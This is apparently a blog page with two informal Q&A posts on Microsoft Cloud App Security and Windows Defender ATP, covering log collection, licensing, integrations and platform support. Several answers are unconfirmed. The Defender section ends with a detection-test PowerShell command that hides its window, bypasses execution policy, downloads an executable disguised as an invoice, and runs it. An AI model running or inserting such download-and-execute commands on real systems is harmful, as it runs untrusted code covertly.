SharePoint Stuff



Microsoft Cloud App Security (MCAS) Q&A

Written by Luke Smith. Posted in Microsoft

Q: How quick can the MACS log collector ingest data
A 50GB\hr, main limitations are bandwidth and processing can be overcome by increasing the compute\bandwidth\adding more collectors
Q: What happens is the MCAS log collector can’t process the data quick enough
A: Data is dropped (DD to confirm), adding more collectors are recommended
Q: Do you need a MCAS log collector per device
A: no can use the same one
Q: Can I add more MCAS log collectors
A: Yes (DD to confirm if they can be load balanced, I think they can but couldn’t find an article
Q: What do I need to do to protect my end users when using the MCAS Proxy
A: Need devices to be Azure AD Joined, as it uses conditional access
Q: Does the MCAS proxy work with non-Windows 10 devices
A: Yes using conditional access from MDM for macOS, Android and iOS – Windows 8.1 or below TBC
Q: If the details of a cloud vendor is in correct how can these be updated
A: Microsoft Support Request from the portal
Q: Do you need to license every user for MCAS to view the activity
A: Not for proxy\firewall logs
Q: Do you need to licenses every user for MCAS is you need to control access using the proxy
A: Yes
Q: Can we create our own application and vendor classification
A: TBC
Q: Can we integrate MCAS with a SIEM
A: Yes
Q: Can we integrate MCAS and ATP (Defender and Office 365) together
A: TBC
Q: Can we integrate AIP with MAS
A: Yes

Useful Links:
Docs.Microsoft: https://docs.microsoft.com/en-us/cloud-app-security/what-is-cloud-app-security

Windows Defender Advanced Threat Protection (WDATP) Q&A

Written by Luke Smith. Posted in Microsoft

Q:Can you configure Defender ATP to use additional or different security threat feeds such as: FireEye, LookingGlass, Infoblox, SecureWorks, RSA, McAfee, Customer prebuilt feed)
A: TBC
Q: Are you able to block particular MD5\applications
A: You can create custom IOC’s and TI;s using API or PS (https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/threat-indicator-concepts-windows-defender-advanced-threat-protection)
Q Can you define automatic custom isolation and block rules (based on MD5 and application names)
A: TBC
Q: Can you Change the ratings of the existing threat categories?
A: Only for the custom Indicators of Compromise IOC’s or Threat Intelligence TI’s
Q:Can you Integrate with other SIEMs\SOCs
A: Currently only HP and splunk
Q: Can Defender ATP Integrate with third-party CMDBs
A: AD using AD connect – TBc for third-parties such as SCCM\LANDesk
Q: Can Windows Defender ATP integrate with Office ATP
A: Yes, WDATP and O365ATP can be integrated and needs enabling as per the following: https://support.office.com/en-us/article/Office-365-Threat-Intelligence-overview-32405DA5-BEE1-4A4B-82E5-8399DF94C512 and https://docs.microsoft.com/en-gb/windows/threat-protection/windows-defender-atp/advanced-features-windows-defender-advanced-threat-protection
Q: Can Defender ATP work with older versions of Windows below 8.1?
A: No, but does work with Windows Server 2012R2 and above https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/configure-server-endpoints-windows-defender-advanced-threat-protection
Q: Can Defender ATP work with non-windows based machines
A: Yes, requires Bitdefender and can run on macOS, Linux, iOS and Android: https://www.bitdefender.com/business/end-point-security-linux-mac.html (Other third-parties such as Lookout and Ziften will be added Nov 2017)
Q: Can Defender integrate with Cloud App Security?
A: TBC
Q: How can I test Defender ATP
A: see: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus:DOS/EICAR_Test_File – text file containing remove the <>
A: once configured and also run:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘http://127.0.0.1/1.exe’, ‘C:\test-WDATP-test\invoice.exe’);Start-Process ‘C:\test-WDATP-test\invoice.exe’

Useful Links:
Docs.Microsoft: https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/windows-defender-advanced-threat-protection
Windows Defender Advanced Threat Protection – Ransomware response playbook https://www.microsoft.com/en-us/download/confirmation.aspx?id=55090